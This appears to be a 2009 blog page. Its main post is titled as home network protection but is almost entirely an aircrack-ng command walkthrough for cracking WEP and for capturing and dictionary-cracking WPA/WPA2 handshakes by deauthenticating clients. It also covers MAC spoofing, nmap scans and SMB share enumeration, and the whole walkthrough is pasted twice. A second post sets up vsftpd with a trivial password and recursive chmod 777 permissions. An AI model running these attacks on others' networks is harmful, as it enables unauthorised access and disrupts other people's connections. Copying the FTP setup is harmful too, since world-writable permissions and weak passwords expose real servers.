Sunday, October 25, 2009
How to protect your wireless home network
To understand that, we will learn how actually to break them first ;-)
apt-get install nmap macchanger
You will need to install aircrack-ng and adapter drivers from sources to get lastest version.
I got Edimax EW-7318USg for ~$30 as recomended devices.
Shortcuts I will use in aircrack-ng suite.
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of client already assosiated with AP (will need for DeAuth attack), ex: 012345abcdef
Interface I will use rausb0.
Simple WEP Crack
Put the card to monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0
And let's start scan
airodump-ng rausb0
Get target network and try if we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
test on all rates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0
Start capturing IVs for target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0
Fake authentication with the access point otherwise it will deny our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or access point to rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use ready-to-send packet
aireplay-ng -2 -r arp-request rausb0
When you got from 40K to 80K data packets, we can try to crack the password
aircrack-ng -b AP-MAC output*.cap - PTW method
aircrack-ng -z -b AP-MAC output*.cap - FMS/KoreK method
When no wireless clients exists
Fragmenation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0
You will get some "fragment-0203-180343.xor" file for the next step.
Use packetforge-ng to create an arp packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request
You can inspect created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct
airdecap-ng -e AP-NAM -w arp-request
View the decrypted packet
tcpdump -n -r arp-request-dec
How to Crack WPA/WPA2
The only way is to capture 4-way authentication handshake
Connected client deauth once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0
For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap
Other useful stuff
MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0
But better with
macchanger --mac 00:11:22:33:44:55
Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M
Scan network for devices
nmap -sP 10.0.0.1-255
Scan services on specific device
nmap 10.0.0.16
nmap -NP 10.0.0.16
Windows information and shares (if open)
smbclient -L \\10.0.0.16
smbclient -L \\10.0.0.16 -U Guest -W workgroup
Kernel modules control
lsmod | grep 73
modprobe rt73
Trace packets by
tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”
Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager
Links
aircrac-ng tutorials and faq
Latest nmap
So, to protect your wireless network, don't use WEP, use WPA/WPA2 with long and complicated password, MAC-filtering will only pause hacker for a while (till he can see one of authenticated clients MACs), hiding SSID doesn't help at all.
UPD: Good news there from aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service
It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.I will use Ubuntu (Gnome desktop) under root account with some non-default tools
apt-get install nmap macchanger
You will need to install aircrack-ng and adapter drivers from sources to get lastest version.
I got Edimax EW-7318USg for ~$30 as recomended devices.
Shortcuts I will use in aircrack-ng suite.
AP-MAC - MAC address of access point (AP), examples:
AP-CH - channel AP is working on, ex: 11
AP-NAM - wireless network name, ex: teddy
MY-MAC - MAC address of your adapter, ex: 001f1f3676fc
CL-MAC - MAC address of client already assosiated with AP (will need for DeAuth attack), ex: 012345abcdef
Interface I will use rausb0.
Simple WEP Crack
Put the card to monitor mode
airmon-ng stop rausb0
airmon-ng start rausb0
And let's start scan
airodump-ng rausb0
Get target network and try if we can inject packets
aireplay-ng -9 -e AP-NAM -a AP-MAC rausb0
test on all rates
aireplay-ng -9 -e AP-NAM -a AP-MAC -B rausb0
Start capturing IVs for target network to files
airodump-ng -c AP-CH --bssid AP-MAC -w output rausb0
Fake authentication with the access point otherwise it will deny our packets
aireplay-ng -1 0 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
aireplay-ng -1 6000 -o 1 -q 10 -e AP-NAM -a AP-MAC -h MY-MAC rausb0
Start aireplay in ARP request replay mode
aireplay-ng -3 -b AP-MAC -h MY-MAC rausb0
Or replay packets from a wireless client
aireplay-ng -2 -a AP-MAC -d ffffffffffff -m 68 -n 68 -t 1 -f 0 rausb0
Or access point to rebroadcast the packet
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes
aireplay-ng -2 -p 0841 -m 68 -n 86 -b AP-MAC -c ffffffffffff -h MY-MAC rausb0
Or aireplay can be used to replay packets from a pcap file
aireplay-ng -2 -p 0841 -b AP-MAC -h MY-MAC -r replay_src-0303-124624.cap rausb0
aireplay-ng -2 -p 0841 -b AP-MAC -c ffffffffffff -h MY-MAC -r some-capture.cap rausb0
Or use ready-to-send packet
aireplay-ng -2 -r arp-request rausb0
When you got from 40K to 80K data packets, we can try to crack the password
aircrack-ng -b AP-MAC output*.cap - PTW method
aircrack-ng -z -b AP-MAC output*.cap - FMS/KoreK method
When no wireless clients exists
Fragmenation attack to obtain PRGA
aireplay-ng -5 -b AP-MAC -h MY-MAC rausb0
Chopchop attack to obtain PRGA
aireplay-ng -4 -b AP-MAC -h MY-MAC rausb0
You will get some "fragment-0203-180343.xor" file for the next step.
Use packetforge-ng to create an arp packet
packetforge-ng -0 -a AP-MAC -h MY-MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0203-180343.xor -w arp-request
You can inspect created packet
tcpdump -n -vvv -e -s0 -r arp-request
Since you are testing against your own AP (you are, right?), then decrypt the packet and ensure it is correct
airdecap-ng -e AP-NAM -w
View the decrypted packet
tcpdump -n -r arp-request-dec
How to Crack WPA/WPA2
The only way is to capture 4-way authentication handshake
Connected client deauth once
aireplay-ng -0 1 -a AP-MAC -c CL-MAC rausb0
or 3 times (to be sure ;-)
aireplay-ng -0 10 -a AP-MAC -c CL-MAC rausb0
For cracking, you will need good wordlists
aircrack-ng -w password.lst,another.lst -b AP-MAC wpa*.cap
Other useful stuff
MAC address change - manual way
ifdown rausb0
ifconfig rausb0 hw ether 00:11:22:33:44:55
ifup rausb0
But better with
macchanger --mac 00:11:22:33:44:55
Set bitrate
iwconfig rausb0 rate 54M
iwconfig rausb0 rate 11M
Scan network for devices
nmap -sP 10.0.0.1-255
Scan services on specific device
nmap 10.0.0.16
nmap -NP 10.0.0.16
Windows information and shares (if open)
smbclient -L \\10.0.0.16
smbclient -L \\10.0.0.16 -U Guest -W workgroup
Kernel modules control
lsmod | grep 73
modprobe rt73
Trace packets by
tcpdump -n -vvv -s0 -e -i
Gnome NetworkManager (sometimes better to stop it during attacks)
/etc/init.d/NetworkManager start|stop|restart
nm-tool --list
tail -f /var/log/daemon.log | grep NetworkManager
Links
aircrac-ng tutorials and faq
Latest nmap
So, to protect your wireless network, don't use WEP, use WPA/WPA2 with long and complicated password, MAC-filtering will only pause hacker for a while (till he can see one of authenticated clients MACs), hiding SSID doesn't help at all.
UPD: Good news there from aircrack team:
updated Slitaz aircrack distribution (Aircrack-ng 1.0 final including sqlite airolib-ng support, patched drivers, etc)
WPA Cracker - cloud cracking service
Sunday, October 11, 2009
Tuesday, October 6, 2009
VSFTPD and virtual user
I will show you how to install FTP server on RedHat Linux and made virtual user "upload" with password "kuku" for uploading and downloading files.
First, you need to run
Now we should create virtual users authentication file, you can use Apache's tools.
'-c' creates new file (remove it when adding new users), '-b' will take password from command line
Now we need to tell how vsftpd should check users, it will use PAM that described in
At this point you can start deamon with
I was dealing with some problem that even if i use username and password pair I just created, it always was return me "Invalid login". I thought that the problem was in the users file and i rewrited it many time. But it was just pwdfile file missing, that I got from
I found it and installed
Information used
First, you need to run
[alexey@blogger ~]$ sudo yum install vsftpdi got version 2.0.1
[alexey@blogger ~]$ vsftpd -vthan let's backup original config
vsftpd: version 2.0.1
[alexey@blogger ~]$ sudo cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.defaultnow we can edit config for our needs, open vi
[alexey@blogger ~]$ sudo vi /etc/vsftpd/vsftpd.confpaste the following
listen=YES
anonymous_enable=NO
local_enable=YES
virtual_use_local_privs=YES
write_enable=YES
connect_from_port_20=YES
secure_chroot_dir=/usr/share/empty
pam_service_name=vsftpd
guest_enable=YES
guest_username=www
local_root=/path/to/ftp-directory
chroot_local_user=YES
hide_ids=YES
dirmessage_enable=NO
tcp_wrappers=YES
check_shell=NO
userlist_enable=YES
anon_umask=0644
ftpd_banner=Welcome to my FTP!
Now we should create virtual users authentication file, you can use Apache's tools.
'-c' creates new file (remove it when adding new users), '-b' will take password from command line
[alexey@blogger ~]$ /usr/local/httpd/bin/htpasswd -cb /path/to/ftp/users upload kuku
Adding password for user default
Now we need to tell how vsftpd should check users, it will use PAM that described in
[alexey@blogger ~]$ cat /etc/pam.d/vsftpdbackup it with
#%PAM-1.0
auth required pam_listfile.so item=user sense=deny file=/etc/vsftpd.ftpusers onerr=succeed
auth required pam_stack.so service=system-auth
auth required pam_shells.so
account required pam_stack.so service=system-auth
session required pam_stack.so service=system-auth
[alexey@blogger ~]$ sudo cp /etc/pam.d/vsftpd /etc/pam.d/vsftpd.defaultand paste the following
[alexey@blogger ~]$ cat /etc/pam.d/vsftpd
# MaggaPlus access
auth required pam_pwdfile.so pwdfile /path/to/ftp/users
account required pam_permit.so
[alexey@blogger ~]$
At this point you can start deamon with
[alexey@blogger ~]$ sudo /etc/init.d/vsftpd startand if everything is ok, try to connect to your new FTP.
I was dealing with some problem that even if i use username and password pair I just created, it always was return me "Invalid login". I thought that the problem was in the users file and i rewrited it many time. But it was just pwdfile file missing, that I got from
[alexey@blogger ~]$ sudo tail /var/log/messagesAll PAM plugins placed in
Oct 5 20:21:57 blogger vsftpd: vsftpd vsftpd succeeded
Oct 5 20:21:59 blogger vsftpd[27288]: PAM unable to dlopen(/lib/security/pam_pwdfile.so)
Oct 5 20:21:59 blogger vsftpd[27288]: PAM [dlerror: /lib/security/pam_pwdfile.so: cannot open shared object file: No such file
Oct 5 20:21:59 blogger vsftpd[27288]: PAM adding faulty module: /lib/security/pam_pwdfile.so
[alexey@blogger ~]$ ll /lib/security/And pam_pwdfile.so was missing :-(
total 1884
-rwxr-xr-x 1 root root 15560 May 12 2006 pam_access.so
-rwxr-xr-x 1 root root 52334 Oct 13 2004 pam_ccreds.so
-rwxr-xr-x 1 root root 6004 May 12 2006 pam_chroot.so
...
I found it and installed
[alexey@blogger ~]$ sudo rpm -i pam-pam_pwdfile-0.99-2.i586.rpmNow it is fine, and FTP auth worked!
warning: pam-pam_pwdfile-0.99-2.i586.rpm: V3 DSA signature: NOKEY, key ID 1bbd5459
[alexey@blogger ~]$ ll /lib/security/pam_pwdfile.soMake sure that FTP root is readable and writable for specified user
-rwxr-xr-x 1 root root 14572 Jul 30 2004 /lib/security/pam_pwdfile.so
[alexey@blogger ~]$ chmod 777 -R /path/to/ftp-directory
[alexey@blogger ~]$ ftp localhost
Connected to localhost (127.0.0.1).
220 Welcome to my FTP!
Name (blogger:alexey): upload
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> close
221 Goodbye.
ftp> bye
[alexey@blogger ~]$
Information used
Subscribe to:
Posts (Atom)
